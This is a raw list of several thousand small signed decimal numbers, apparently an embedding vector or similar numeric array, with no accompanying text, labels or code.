-0.019895901903510094, -0.0007420990732498467, 0.01704568602144718, -0.0030101067386567593, -0.01065007783472538, 0.0037852267269045115, 0.012547904625535011, -0.014612574130296707, -0.012596567161381245, -0.019868094474077225, 0.0022332489024847746, 0.009426569566130638, -0.0025495535228401423, -0.02713962271809578, 0.013465534895658493, 0.02648615837097168, 0.0016788471257314086, 0.006757098715752363, 0.040236715227365494, -0.001764874905347824, -0.00205250340513885, 0.005126914009451866, 0.014890643768012524, -0.020841339603066444, 0.0003108734672423452, -0.01939537562429905, 0.006718864198774099, -0.0440184660255909, -0.0158360805362463, -0.0006313055637292564, 0.034397248178720474, 0.0008932995842769742, -0.014848933555185795, 0.0164200272411108, 0.005498832557350397, 0.010962906293570995, 0.009301437996327877, -0.011727598495781422, 0.008495035581290722, -0.013952157460153103, -0.00273725064471364, 0.013361259363591671, 0.05689310282468796, -0.004789754282683134, -0.014918450266122818, -0.014118999242782593, 0.021522611379623413, 0.011206217110157013, 0.029642252251505852, 0.008759202435612679, -0.009920143522322178, -0.022996380925178528, -0.004827988799661398, -0.004640291444957256, -0.023774977773427963, -0.005119962152093649, 0.015961213037371635, 0.032756634056568146, 0.015460686758160591, 0.016267089173197746, 0.0057282401248812675, 0.003097003558650613, 0.013681039214134216, -0.0007851130212657154, 0.022481951862573624, -0.004605532623827457, 0.013847880996763706, 0.007139444816857576, -0.008821767754852772, 0.012165558524429798, 0.02035471796989441, -0.030254006385803223, 0.029280761256814003, 0.038901980966329575, -0.02392791584134102, -0.021258443593978882, 0.007994510233402252, -0.026958877220749855, -0.012012620456516743, -0.016892746090888977, -0.02036862075328827, -0.017657438293099403, 0.008098785765469074, -0.0026155950035899878, -0.0014511772897094488, -0.02939198911190033, 0.00839771144092083, 0.0425725020468235, 0.023010285571217537, 0.023761073127388954, 0.006704960484057665, 0.004153669346123934, 0.005797757767140865, -0.01401472371071577, -0.008467229083180428, -0.010038323700428009, 0.01388959214091301, -0.00901641696691513, 0.0012565284268930554, 0.004800181835889816, 0.01876971870660782, 0.002250628313049674, 0.015113099478185177, 0.015113099478185177, -0.0022523661609739065, 0.012561808340251446, -0.012464483268558979, 0.0007512232405133545, 0.005453646183013916, 0.01001051627099514, -0.016725905239582062, 0.004049392882734537, -0.003993778955191374, -0.01618366874754429, -0.01418156549334526, 0.02775137685239315, -0.00266599515452981, -0.023135416209697723, -0.0007968440768308938, -0.0019325858447700739, -0.007959751412272453, -0.013201368972659111, -0.01907559484243393, 0.028502166271209717, -0.048300743103027344, 0.0018022406147792935, -0.0164200272411108, -0.021800680086016655, -0.001154859084635973, 0.006656298413872719, -0.013583715073764324, -0.019478797912597656, -0.020452041178941727, -0.0061001586727797985, 0.03186681121587753, 0.012457531876862049, -0.0021480899304151535, 0.026861554011702538, -0.009266680106520653, 0.030393041670322418, 0.021091602742671967, 0.007987557910382748, -0.005432790610939264, 0.0015059222932904959, -0.01176930870860815, -0.010754353366792202, -0.010455428622663021, -0.007994510233402252, 0.008967754431068897, 0.03993083909153938, -0.01337516214698553, -0.0017579231644049287, 0.015655335038900375, -0.01454305648803711, -0.029169533401727676, -0.008335145190358162, 0.04999696835875511, 0.01739327237010002, 0.022120460867881775, -0.01842213049530983, 0.0034445910714566708, 0.03322935476899147, 0.05622573569417, -0.004070248454809189, 0.00741751492023468, 0.007146396674215794, -0.028557779267430305, -0.001953441184014082, 0.016280993819236755, -0.0017466265708208084, 0.007869378663599491, -0.01422327570617199, 0.02068840153515339, -0.03448066860437393, -0.005477976985275745, 0.009579508565366268, -0.033757686614990234, -0.006979554891586304, 0.004845368210226297, 0.015113099478185177, -0.0228851530700922, -0.018672393634915352, -0.015905598178505898, 0.01747669279575348, 0.020785724744200706, 0.01422327570617199, -0.014077289029955864, 0.009906240738928318, -0.007695584557950497, 0.023677652701735497, -0.024150371551513672, -0.02715352736413479, 0.005877702496945858, -0.002855430357158184, 0.007334094028919935, 0.014195469208061695, -0.0015945570776239038, 0.008022316731512547, -0.026096859946846962, -0.00564134307205677, -0.03136628493666649, 0.006079303566366434, -0.021453093737363815, -0.023065898567438126, 0.03250637277960777, 0.01647564209997654, -0.016086343675851822, -0.02872462198138237, -0.014904547482728958, 0.022829540073871613, -0.000059795893321279436, 0.012381062842905521, 0.006430366542190313, 0.005224238615483046, -0.02262098714709282, 0.008981658145785332, 0.024053046479821205, 0.019576121121644974, 0.008960803039371967, 0.007952799089252949, -0.01614195853471756, 0.03715014085173607, -0.0018404752481728792, 0.012283737771213055, -0.01908949948847294, 0.024928966537117958, 0.004734140355139971, -0.0037887024227529764, 0.008425517939031124, 0.017810378223657608, 0.0011183624155819416, 0.01582217775285244, 0.014278889633715153, -0.00840466283261776, 0.007243721280246973, 0.03595443814992905, 0.0382068045437336, -0.007792909163981676, -0.018324807286262512, 0.026069054380059242, 0.03183900564908981, -0.002884975401684642, 0.020187875255942345, 0.016712000593543053, 0.005992406513541937, -0.004973975475877523, -0.016239281743764877, 0.02224559336900711, -0.0028780235443264246, 0.03812338411808014, -0.0016918815672397614, 0.018296999856829643, 0.006416463293135166, 0.008550649508833885, -0.017963316291570663, -0.011428672820329666, -0.034341633319854736, 0.007952799089252949, 0.00342199788428843, -0.02352471463382244, 0.000030413895728997886, 0.020785724744200706, -0.008474180474877357, -0.002893664874136448, 0.012193365022540092, 0.0019047788809984922, -0.02355252206325531, -0.010295538231730461, 0.028808042407035828, 0.005846419837325811, -0.006121013779193163, 0.03687207028269768, -0.032450757920742035, 0.0108238710090518, 0.0008311683195643127, -0.03531487658619881, 0.01996541954576969, 0.0063956077210605145, 0.04323986917734146, -0.0018039785791188478, -0.014237179420888424, -0.012770360335707664, -0.022384626790881157, 0.016016826033592224, -0.01704568602144718, -0.006920464802533388, 0.006385180167853832, -0.016600772738456726, 0.010239924304187298, -0.0006916989223100245, 0.00013729701458942145, 0.0020073172636330128, -0.034703124314546585, 0.006635443307459354, 0.017268141731619835, 0.018547262996435165, 0.006558973807841539, -0.00032977352384477854, -0.004876650869846344, 0.0184499379247427, -0.0004805395728908479, -0.002829361241310835, -0.0006838781991973519, 0.00917630735784769, -0.006656298413872719, -0.0006434711394831538, 0.002712919609621167, -0.014306697063148022, 0.02481773868203163, 0.021411383524537086, 0.02911391854286194, 0.003816509386524558, 0.009934047237038612, 0.024400634691119194, -0.004907933995127678, -0.026096859946846962, 0.019437085837125778, -0.02809896506369114, -0.012596567161381245, -0.03139409422874451, 0.005829040426760912, 0.027528921142220497, 0.006562449969351292, 0.005995882209390402, -0.028891462832689285, 0.012819022871553898, -0.0028397890273481607, -0.0019795100670307875, -0.02031300589442253, -0.01743498258292675, 0.029531024396419525, 0.009072030894458294, -0.00024287668929900974, 0.02805725298821926, -0.00460900878533721, -0.004157145041972399, 0.010969857685267925, -0.005457121878862381, 0.007410563062876463, 0.0066841053776443005, -0.0016484331572428346, 0.004720236640423536, 0.016586869955062866, 0.018157964572310448, -0.011192313395440578, 0.02130015566945076, -0.01181101892143488, -0.006485980469733477, -0.03172777593135834, 0.0017813853919506073, -0.012617422267794609, -0.0147098982706666, 0.005975027102977037, -0.03317373991012573, 0.0013773150276392698, 0.010212117806077003, 0.0064407940953969955, -0.020465945824980736, 0.014918450266122818, -0.023010285571217537, -0.015432880260050297, -0.012040426954627037, -0.019923709332942963, -0.006121013779193163, -0.009892337024211884, 0.005053920671343803, -0.001759661128744483, 0.00027285609394311905, 0.03848487511277199, -0.0008494166540913284, -0.01368799153715372, 0.004456070251762867, -0.0035506051499396563, -0.02102208510041237, -0.025721466168761253, -0.03945811837911606, -0.01996541954576969, 0.007299335207790136, -0.0007242852007038891, -0.02296857349574566, -0.010191261768341064, -0.0025200084783136845, -0.0030813622288405895, -0.020827436819672585, -0.0012799905380234122, -0.011977861635386944, -0.0014876739587634802, -0.001502446481026709, 0.011525997892022133, 0.039541542530059814, -0.006468601059168577, -0.01933976262807846, 0.02196752279996872, -0.036593999713659286, -0.008008413016796112, -0.00014870222366880625, 0.0007677336107008159, -0.02424769662320614, -0.0011991765350103378, -0.0015528466319665313, -0.018157964572310448, -0.012151654809713364, 0.005175576079636812, -0.022342916578054428, 0.012944154441356659, -0.01840822771191597, -0.018575070425868034, 0.015224327333271503, -0.0026242847088724375, -0.0007490508141927421, -0.0021880625281482935, -0.04162706434726715, -0.000748181832022965, 0.024039143696427345, 0.017518404871225357, -0.0164200272411108, 0.0005239879828877747, 0.023719362914562225, -0.003152617486193776, 0.0013104043900966644, 0.005839467979967594, 0.01160246692597866, -0.0006456435658037663, 0.00839771144092083, 0.014765512198209763, -0.014487442560493946, -0.007716440130025148, -0.024623090401291847, 0.028335323557257652, -0.02231511101126671, 0.027501113712787628, -0.03005935624241829, 0.006270476616919041, -0.014404021203517914, 0.01308318879455328, -0.005769950803369284, -0.027236947789788246, 0.004907933995127678, 0.005766474641859531, -0.023010285571217537, 0.0088982367888093, 0.026694711297750473, 0.02581879124045372, 0.028585586696863174, 0.023469099774956703, -0.003653143532574177, -0.012186413630843163, -0.010093937627971172, 0.0016154124168679118, 0.0029822997748851776, 0.0012573973508551717, 0.018797526136040688, 0.02581879124045372, -0.01842213049530983, -0.01434840727597475, -0.01586388796567917, -0.030504269525408745, -0.012116895988583565, 0.01737936958670616, 0.0190338846296072, -0.001991675700992346, 0.0009497825521975756, 0.012360207736492157, 0.021842392161488533, 0.0190338846296072, 0.006725816056132317, 0.027570631355047226, -0.009906240738928318, -0.010107841342687607, -0.009030320681631565, -0.006235717795789242, -0.01747669279575348, 0.0023705458734184504, 0.0019152064342051744, 0.0040146345272660255, -0.007966702803969383, -0.00901641696691513, 0.019603928551077843, -0.015293844975531101, -0.0031056932639330626, -0.005210334900766611, -0.025930019095540047, -0.008182207122445107, 0.0022037040907889605, -0.020896954461932182, -0.011067182756960392, 0.0007777267601341009, 0.02648615837097168, 0.02846045419573784, 0.020883049815893173, 0.014118999242782593, 0.03445286303758621, 0.009482183493673801, -0.0023253594990819693, 0.006934368517249823, 0.034286018460989, 0.0177964735776186, 0.011386962607502937, -0.02064669132232666, 0.016559062525629997, -0.029531024396419525, 0.03514803573489189, -0.005630915518850088, 0.007059499621391296, 0.005477976985275745, -0.02683374658226967, -0.0020333861466497183, -0.0035158463288098574, -0.010830823332071304, -0.012200317345559597, -0.003409832250326872, 0.01876971870660782, -0.027876507490873337, 0.0335630364716053, -0.024136468768119812, -0.007716440130025148, 0.021884102374315262, -0.022370724007487297, 0.019256340339779854, -0.006305234972387552, 0.0203408133238554, 0.007285431493073702, -0.009975758381187916, 0.005849895533174276, -0.013493342325091362, 0.005092155188322067, 0.003277749055996537, 0.005933316890150309, -0.00011579004785744473, -0.0049704997800290585, 0.004456070251762867, -0.021244540810585022, -0.02551291324198246, -0.016253186389803886, 0.011240975931286812, -0.003107431111857295, -0.010267731733620167, 0.033424001187086105, -0.014751608483493328, 0.00444216700270772, 0.010086986236274242, 0.015238231047987938, -0.0005843812832608819, -0.002236724831163883, 0.019534410908818245, -0.013555907644331455, 0.013430777005851269, 0.030782338231801987, -0.011393914930522442, 0.011213169433176517, 0.015363362617790699, 0.015738757327198982, 0.015446783043444157, -0.010448477230966091, -0.012485339306294918, 0.02070230431854725, 0.0013399493182078004, 0.016600772738456726, 0.009725495241582394, 0.012311545200645924, -0.009252776391804218, 0.0013277838006615639, -0.0235386174172163, 0.024122564122080803, -0.009690736420452595, 0.00919021014124155, 0.000324559718137607, 0.007062975782901049, -0.0037122333887964487, -0.014487442560493946, 0.001784861204214394, 0.021077699959278107, 0.008717491291463375, 0.011567708104848862, -0.009357052855193615, -0.008126593194901943, 0.01995151676237583, -0.012158607132732868, 0.029809094965457916, -0.004160621203482151, 0.013312596827745438, 0.019909804686903954, 0.018658490851521492, 0.01616976596415043, 0.01679542288184166, -0.008654925972223282, -0.012673036195337772, -0.021828487515449524, 0.008953850716352463, -0.03064330294728279, -0.006944796070456505, 0.006492932327091694, 0.0009350100881420076, 0.0013512459117919207, 0.014445731416344643, 0.006284379865974188, -0.014821126125752926, 0.006576353218406439, -0.006054972298443317, -0.010344200767576694, -0.002384449355304241, 0.00839771144092083, 0.005217286758124828, -0.012770360335707664, 0.006346945650875568, 0.002271483652293682, -0.012186413630843163, 0.03450847417116165, 0.012464483268558979, 0.005095630884170532, -0.03411917760968208, -0.0013321286533027887, 0.017963316291570663, 0.0029301615431904793, 0.0005083465366624296, 0.011428672820329666, 0.007653874345123768, -0.0016797160496935248, -0.008286483585834503, -0.007285431493073702, -0.014890643768012524, 0.001988199772313237, -0.002954492811113596, -0.0061036343686282635, 0.013882639817893505, -0.005265948828309774, -0.0016588608268648386, -0.001114886486902833, -0.0073966593481600285, 0.014779415912926197, 0.020215682685375214, -0.003673998638987541, 0.0010627484880387783, 0.007059499621391296, -0.011866633780300617, -0.012443628162145615, -0.003465446177870035, -0.004883602727204561, 0.003312507877126336, -0.017865991219878197, -0.02712571993470192, -0.006437318399548531, -0.00249915337190032, -0.006465125363320112, -0.008682732470333576, -0.005043493118137121, 0.013611521571874619, 0.010719594545662403, 0.01500187162309885, 0.028001639991998672, -0.00054527772590518, -0.006899609696120024, 0.00888433400541544, 0.002280173357576132, 0.017963316291570663, 0.009148499928414822, -0.006746671162545681, 0.001021037925966084, 0.011227072216570377, -0.0033941909205168486, -0.002271483652293682, -0.006656298413872719, -0.004480401519685984, 0.0018300475785508752, -0.016392221674323082, -0.0029875135514885187, 0.013465534895658493, -0.003959020134061575, 0.013646280393004417, -0.01746279001235962, -0.0015823915600776672, -0.020521558821201324, -0.017587922513484955, 0.006197483278810978, -0.006687581073492765, -0.004275324754416943, -0.011845777742564678, 0.005443218629807234, 0.028001639991998672, -0.006993458140641451, -0.04104311764240265, 0.0006187055259943008, -0.028321420773863792, -0.01208908949047327, -0.02294076792895794, -0.022162171080708504, 0.022023135796189308, 0.008682732470333576, 0.008960803039371967, 0.005908985622227192, -0.005453646183013916, -0.024108661338686943, 0.015043581835925579, 0.009211065247654915, -0.0001718385174171999, -0.00922496896237135, -0.036649614572525024, 0.022148268297314644, -0.016336606815457344, -0.005561398342251778, -0.007779005449265242, 0.011088037863373756, -0.014118999242782593, 0.016350511461496353, 0.020744014531373978, -0.021745067089796066, -0.025665853172540665, 0.012367159128189087, 0.013778364285826683, 0.0025460775941610336, -0.01126878336071968, -0.009329245425760746, 0.002320145722478628, -0.00039777031634002924, -0.02259317971765995, 0.005154720973223448, 0.0007551335729658604, -0.005335466470569372, -0.006906561553478241, 0.015961213037371635, -0.0008020579116418958, 0.0007772922981530428, 0.02391401119530201, -0.006072351709008217, 0.0013460321351885796, -0.011213169433176517, -0.012235076166689396, -0.0044352151453495026, 0.011574659496545792, 0.004250993952155113, 0.0164200272411108, -0.014404021203517914, -0.020757919177412987, 0.009947950951755047, 0.01418851688504219, 0.021536514163017273, 0.02385839819908142, 0.0011027209693565965, 0.01578046754002571, -0.010358104482293129, 0.010114792734384537, 0.002076834673061967, -0.015140906907618046, 0.009245824068784714, -0.00564134307205677, 0.008050124160945415, 0.0015206948155537248, -0.0014998395927250385, 0.0003304252459201962, -0.017574017867445946, 0.003618384711444378, 0.005356321576982737, 0.008578456938266754, 0.004212758969515562, -0.002031648298725486, 0.002973610069602728, 0.021758969873189926, -0.0035506051499396563, 0.008084882982075214, -0.01935366541147232, 0.004337890539318323, -0.0066841053776443005, -0.011755404993891716, 0.008390759117901325, -0.0007147265714593232, -0.028210192918777466, -0.0008320373017340899, -0.00983672309666872, -0.014112047851085663, 0.0031109070405364037, -0.022523662075400352, -0.010879484936594963, -0.01164417713880539, 0.003781750798225403, -0.007848523557186127, 0.011824922636151314, -0.01806064136326313, 0.007785957306623459, -0.0018804477294906974, -0.012638277374207973, 0.010997665114700794, 0.0101704066619277, -0.05978503078222275, 0.0009532584226690233, 0.004487352911382914, 0.005540542770177126, 0.005884654354304075, 0.015710949897766113, 0.0034671842586249113, 0.012388014234602451, 0.00921801757067442, -0.0007703405572101474, 0.02652786858379841, 0.008821767754852772, -0.0016084606759250164, -0.02192581258714199, 0.003109169192612171, 0.027528921142220497, 0.006558973807841539, 0.005380652844905853, -0.013458583503961563, 0.004720236640423536, -0.006037592887878418, 0.00443173898383975, -0.004414359573274851, 0.034425053745508194, 0.003376811509951949, 0.013250031508505344, 0.00999661348760128, -0.003618384711444378, -0.0015841295244172215, -0.022426338866353035, -0.006256572902202606, -0.024053046479821205, -0.037233561277389526, -0.00901641696691513, 0.015989020466804504, 0.015558010898530483, 0.041460223495960236, -0.007139444816857576, 0.0007069058483466506, -0.00002196860805270262, -0.006061924155801535, -0.022176075726747513, -0.027236947789788246, 0.005119962152093649, 0.000421449716668576, 0.028863657265901566, 0.01680932566523552, -0.018505552783608437, 0.0074731288477778435, -0.002954492811113596, -0.015460686758160591, -0.02061888389289379, 0.005258996970951557, -0.020799629390239716, 0.013055382296442986, 0.00327079719863832, 0.012040426954627037, 0.00017303334607277066, -0.0016614677151665092, 0.020215682685375214, 0.002330573508515954, 0.02581879124045372, -0.032144881784915924, -0.0025356500409543514, 0.006082779262214899, -0.02287125028669834, 0.013423824682831764, -0.00590550946071744, -0.0017666128696873784, 0.0203408133238554, -0.0049704997800290585, -0.010358104482293129, -0.004456070251762867, -0.015585818327963352, 0.006548546254634857, -0.007772054057568312, 0.015043581835925579, 0.02846045419573784, 0.006631967145949602, -0.003886027028784156, 0.003594053676351905, 0.022329013794660568, -0.02939198911190033, -0.010253828018903732, 0.0008568029152229428, 0.004171048756688833, -0.013423824682831764, -0.00444216700270772, -0.017838183790445328, 0.022120460867881775, 0.0055996328592300415, -0.007125541567802429, 0.01813015714287758, 0.019770771265029907, -0.02135576866567135, 0.006037592887878418, 0.0058603230863809586, -0.008084882982075214, 0.0025790983345359564, -0.016086343675851822, -0.005279852543026209, -0.027042297646403313, 0.01878362149000168, 0.01308318879455328, -0.007285431493073702, 0.020479848608374596, 0.0007894578739069402, 0.01143562514334917, 0.006096682511270046, 0.009732446633279324, 0.005672626197338104, -0.0025860501918941736, 0.009002513252198696, 0.016350511461496353, -0.0025669329334050417, 0.015071389265358448, 0.0005774295423179865, 0.0013077975017949939, 0.008634070865809917, 0.005046968813985586, -0.0018317855428904295, -0.024706510826945305, 0.013124899938702583, 0.032701022922992706, -0.007890233770012856, -0.021105505526065826, -0.0038929786533117294, 0.012992816045880318, 0.001233935239724815, -0.008592359721660614, -0.010782160796225071, 0.016906650736927986, -0.001398170250467956, -0.002283649053424597, -0.00032890457077883184, -0.0022419386077672243, 0.008383807726204395, -0.001026251702569425, -0.00982977170497179, -0.00888433400541544, -0.009788060560822487, 0.004546443000435829, -0.014904547482728958, -0.013792267069220543, 0.03612128272652626, -0.032117076218128204, 0.004942692816257477, 0.01874191127717495, -0.0019343238091096282, -0.0018873994704335928, -0.010281634517014027, -0.02263488993048668, -0.008411615155637264, 0.0025547672994434834, -0.020757919177412987, 0.0015102671459317207, -0.00020355585729703307, -0.0017379369819536805, 0.010232972912490368, 0.01647564209997654, 0.03183900564908981, 0.0021498280111700296, 0.003123072674497962, -0.013771411962807178, 0.009294486604630947, 0.03328496962785721, 0.0021828487515449524, 0.04037575051188469, -0.00014120737614575773, -0.01130354218184948, -0.021369673311710358, 0.009655977599322796, -0.0036844261921942234, -0.030226198956370354, -0.0041501931846141815, -0.018283097073435783, -0.0005678709130734205, 0.026221992447972298, 0.006562449969351292, -0.02256537228822708, 0.03915224224328995, -0.00007321059092646465, 0.0003230390138924122, -0.004946168512105942, -0.01618366874754429, 0.02483164332807064, 0.001977772219106555, 0.00017487989680375904, 0.00029566651210188866, 0.00637475261464715, -0.006593732628971338, -0.021800680086016655, 0.02067449688911438, 0.006075827404856682, -0.00085767189739272, -0.019590025767683983, 0.005533591378480196, 0.005703908856958151, 0.011380011215806007, -0.0022523661609739065, -0.006138393189758062, -0.016962263733148575, 0.012714746408164501, -0.013952157460153103, 0.014987967908382416, -0.0007012575515545905, -0.00022147833078633994, 0.015140906907618046, 0.002681636717170477, 0.019200727343559265, -0.012471435591578484, -0.004396980628371239, -0.002973610069602728, -0.008105738088488579, 0.020187875255942345, 0.004247517790645361, -0.003569722408428788, 0.012735601514577866, -0.004595105070620775, 0.015460686758160591, 0.015919502824544907, -0.0005131258512847126, 0.0073132384568452835, -0.013222224079072475, 0.017337659373879433, 0.01679542288184166, -0.008182207122445107, 0.012895491905510426, 0.016572967171669006, 0.0022141316439956427, 0.000812919985037297, -0.0025947398971766233, -0.0036844261921942234, 0.013215272687375546, -0.017309851944446564, -0.022329013794660568, 0.019923709332942963, 0.021425286307930946, 0.015975115820765495, -0.013528101146221161, -0.006357373204082251, 0.005877702496945858, -0.007542646024376154, -0.0033038181718438864, 0.001086210599169135, 0.009649026207625866, -0.014793318696320057, 0.007952799089252949, -0.010302490554749966, 0.012102993205189705, 0.016030730679631233, 0.002304504392668605, 0.003253418020904064, -0.0020907381549477577, 0.006774478126317263, -0.00213244860060513, -0.027348175644874573, -0.01616976596415043, -0.00411543482914567, -0.008793961256742477, -0.011046326719224453, 0.0031839003786444664, 0.0008594098035246134, 0.0328400544822216, -0.011713694781064987, -0.007243721280246973, -0.0021376623772084713, 0.01160246692597866, 0.0008550649508833885, 0.012499242089688778, -0.013674087822437286, 0.008620167151093483, 0.00889128539711237, 0.007500935811549425, -0.003505418775603175, 0.01127573475241661, 0.018797526136040688, 0.010309441946446896, -0.02456747554242611, -0.00073818868258968, 0.019284147769212723, -0.028974885120987892, 0.01875581592321396, 0.01258961483836174, 0.0023774977307766676, 0.004556870553642511, 0.02513751946389675, -0.032812248915433884, -0.007799861021339893, -0.014807222411036491, -0.022495854645967484, -0.02547120302915573, 0.009204113855957985, 0.013542004860937595, -0.012999768368899822, 0.006739719305187464, -0.02068840153515339, 0.009412666782736778, -0.007980606518685818, 0.01451524905860424, -0.003604481229558587, 0.017532307654619217, 0.03612128272652626, 0.023441292345523834, -0.003296866314485669, 0.0004609877651091665, -0.019159017130732536, -0.009044223465025425, -0.001948227290995419, 0.02711181528866291, -0.011338300071656704, -0.00622529024258256, 0.006121013779193163, 0.003500204998999834, 0.004087627865374088, 0.016322704032063484, 0.022773925215005875, -0.00469590537250042, 0.012777312658727169, 0.0012504456099122763, 0.021814584732055664, -0.003474135883152485, 0.005279852543026209, -0.00314392801374197, -0.01049018744379282, -0.009975758381187916, -0.005902033764868975, -0.0053945560939610004, 0.005081727635115385, -0.03359084576368332, -0.0063121868297457695, 0.0003766978334169835, 0.00621486222371459, -0.0003519322199281305, -0.0010201690020039678, -0.0032621074933558702, -0.018324807286262512, -0.009767205454409122, 0.008508939296007156, 0.01932585798203945, 0.00103059655521065, -0.0066041601821780205, 0.016976168379187584, 0.01878362149000168, -0.004984403029084206, -0.006628491450101137, -0.013180513866245747, -0.012666083872318268, -0.016545159742236137, -0.00984367448836565, 0.004967023618519306, -0.0014729015529155731, -0.00840466283261776, -0.0033976666163653135, 0.02362203784286976, -0.00443173898383975, 0.019200727343559265, 0.0003558425814844668, -0.014404021203517914, -0.032089266926050186, -0.0074731288477778435, 0.00596112385392189, 0.005189479794353247, -0.0007542646490037441, 0.0018561166943982244, -0.019506603479385376, 0.02939198911190033, -0.010900340043008327, -0.017601825296878815, 0.0028971408028155565, 0.005109534598886967, -0.029308568686246872, -0.0021567796356976032, -0.026889359578490257, 0.012506194412708282, -0.00362881226465106, -0.008175255730748177, -0.017504500225186348, 0.010281634517014027, 0.028168480843305588, 0.003284700680524111, 0.001948227290995419, 0.00840466283261776, 0.029586637392640114, -0.014751608483493328, 0.00015391604392789304, -0.005036541260778904, 0.03612128272652626, -0.007480080705136061, 0.0010497139301151037, 0.00637475261464715, 0.010253828018903732, -0.003286438761278987, 0.016406124457716942, -0.010399814695119858, 0.0073549491353333, -0.009398763068020344, -0.004706333391368389, 0.0082447724416852, 0.005724764429032803, -0.012853781692683697, 0.009113741107285023, -0.0023114560171961784, -0.0008841754170134664, -0.0046785264275968075, -0.00499830674380064, -0.012951105833053589, 0.04668793827295303, 0.006725816056132317, 0.005787329748272896, 0.0074731288477778435, -0.020076647400856018, 0.020452041178941727, -0.004984403029084206, 0.003206493565812707, 0.006138393189758062, 0.003538439515978098, 0.013041478581726551, 0.004800181835889816, -0.006760574411600828, 0.009760254062712193, 0.020215682685375214, -0.009739398956298828, -0.014918450266122818, -0.012047378346323967, 0.008703588508069515, -0.019812481477856636, 0.03136628493666649, 0.020883049815893173, 0.007320190314203501, 0.003886027028784156, -0.012228123843669891, 0.0024209460243582726, 0.011741502210497856, -0.028307516127824783, -0.001744888722896576, -0.003913833759725094, -0.006739719305187464, 0.01586388796567917, -0.015544108115136623, -0.018644588068127632, -0.0060202134773135185, -0.026263702660799026, -0.004129338078200817, 0.001224376610480249, -0.021856294944882393, -0.010205165483057499, 0.0033038181718438864, -0.00563439168035984, 0.0005917675443924963, -0.007723391521722078, 0.003385501215234399, -0.01744888722896576, -0.004257945343852043, -0.012617422267794609, -0.017295949161052704, 0.014848933555185795, 0.009127644822001457, -0.013938253745436668, -0.00791804026812315, 0.021800680086016655, -0.011532949283719063, -0.01466818805783987, 0.009496087208390236, -0.014765512198209763, -0.008508939296007156, 0.019603928551077843, -0.005717812571674585, 0.008460276760160923, -0.04399066045880318, -0.001204390311613679, -0.010517993941903114, 0.016267089173197746, 0.009315341711044312, -0.000013462222341331653, 0.01160941831767559, 0.018171869218349457, -0.018853139132261276, 0.015975115820765495, -0.005867274943739176, -0.015099195763468742, 0.011081085540354252, 0.0011852729367092252, -0.01614195853471756, 0.02036862075328827, 0.006044544745236635, -0.0005869881715625525, -0.0024035668466240168, 0.003032699925825, -0.007772054057568312, -0.019450990483164787, 0.00901641696691513, -0.010295538231730461, -0.0039381650276482105, 0.003767847316339612, -0.015154809691011906, 0.026013439521193504, -0.02231511101126671, 0.0120960408821702, 0.002191538456827402, -0.02581879124045372, -0.006833568215370178, -0.022203881293535233, -0.003896454581990838, -0.00906507857143879, -0.018283097073435783, -0.0004418704775162041, 0.0013095354661345482, -0.010274683125317097, 0.01678151823580265, 0.012464483268558979, -0.001929110032506287, -0.0026051674503833055, -0.005140817258507013, -0.0034480667673051357, 0.01224897988140583, -0.010024419985711575, 0.011234024539589882, 0.013611521571874619, -0.010351152159273624, -0.008606263436377048, 0.01646173931658268, -0.020535463467240334, 0.016378317028284073, 0.006475552916526794, -0.015196520835161209, -0.004178000148385763, 0.016600772738456726, 0.005582253448665142, -0.024358924478292465, -0.0009549963288009167, -0.008140496909618378, -0.014765512198209763, 0.033702071756124496, 0.019450990483164787, -0.01811625435948372, -0.009072030894458294, 0.006527691148221493, -0.0026503538247197866, 0.007466176990419626, -0.0012530524982139468, 0.008654925972223282, -0.008008413016796112, 0.019756866618990898, 0.01032334566116333, -0.00037930472171865404, 0.0008194372639991343, -0.015279941260814667, 0.00954474974423647, -0.006200958974659443, -0.012388014234602451, -0.018588973209261894, -0.015266037546098232, 0.027973832562565804, -0.010031372308731079, 0.014459635131061077, 0.02103598788380623, -0.011525997892022133, -0.025068001821637154, 0.007855474948883057, 0.014431828632950783, 0.029864707961678505, 0.018630683422088623, 0.0015528466319665313, 0.004824513103812933, -0.009878433309495449, -0.01229069009423256, -0.013215272687375546, -0.015196520835161209, 0.0010140861850231886, -0.0027737473137676716, 0.008105738088488579, -0.016044633463025093, 0.008001461625099182, -0.012061282061040401, 0.015015775337815285, 0.01712910644710064, -0.012659132480621338, 0.012673036195337772, -0.007139444816857576, 0.01181101892143488, -0.00852979440242052, 0.0037991302087903023, 0.0025599810760468245, -0.0024070425424724817, 0.006649346556514502, 0.009266680106520653, 0.006124489940702915, 0.0025651948526501656, 0.0033646458759903908, 0.001372970174998045, 0.004348318092525005, -0.0015041844453662634, 0.012304593808948994, 0.01388959214091301, 0.018338710069656372, 0.029002690687775612, 0.0004640291735995561, -0.03359084576368332, 0.012944154441356659, 0.0018752339528873563, 0.0037608954589813948, -0.016280993819236755, 0.0035280119627714157, -0.009037272073328495, 0.0013807908399030566, 0.011727598495781422, 0.007855474948883057, -0.005203383043408394, 0.011567708104848862, 0.01940928027033806, -0.0016814540140330791, -0.005199907347559929, 0.007827667519450188, 0.012242027558386326, -0.0036948539782315493, 0.002994465408846736, 0.012513145804405212, 0.005036541260778904, -0.02684764936566353, -0.017295949161052704, -0.001046238001435995, 0.006093206815421581, 0.03317373991012573, -0.03915224224328995, 0.016002923250198364, 0.0016223641578108072, -0.007876330055296421, -0.008342097513377666, 0.0011305279331281781, 0.009746350347995758, -0.0121307997033, -0.0016840609023347497, 0.0031978038605302572, 0.012304593808948994, -0.005151245277374983, 0.015710949897766113, 0.00032738386653363705, -0.004042441491037607, -0.007160299923270941, 0.0048140850849449635, -0.0019273720681667328, 0.041182152926921844, 0.004025062080472708, -0.02199533022940159, -0.00009151324047707021, -0.001690143602900207, -0.011678935959935188, -0.0023427389096468687, -0.03250637277960777, -0.007945847697556019, 0.0012547904625535011, 0.02807115763425827, -0.0014659498119726777, 0.020785724744200706, -0.03656619414687157, -0.0035662464797496796, -0.008057075552642345, -0.017031781375408173, -0.0021567796356976032, -0.005585729144513607, 0.008717491291463375, -0.019492700695991516, 0.02584659866988659, -0.008126593194901943, -0.006141868885606527, 0.009141548536717892, 0.013827025890350342, 0.019770771265029907, 0.00836990401148796, 0.018839236348867416, -0.004508208483457565, 0.0014450945891439915, -0.021202830597758293, 0.03645496442914009, 0.012040426954627037, -0.018811428919434547, -0.03765066713094711, -0.0077303433790802956, 0.007438370026648045, -0.0007642577402293682, -0.0004045048262923956, -0.005144293420016766, -0.009899288415908813, -0.02808506041765213, -0.00043513596756383777, 0.0019360617734491825, -0.020744014531373978, 0.019909804686903954, -0.013152706436812878, -0.013256982900202274, -0.010622270405292511, 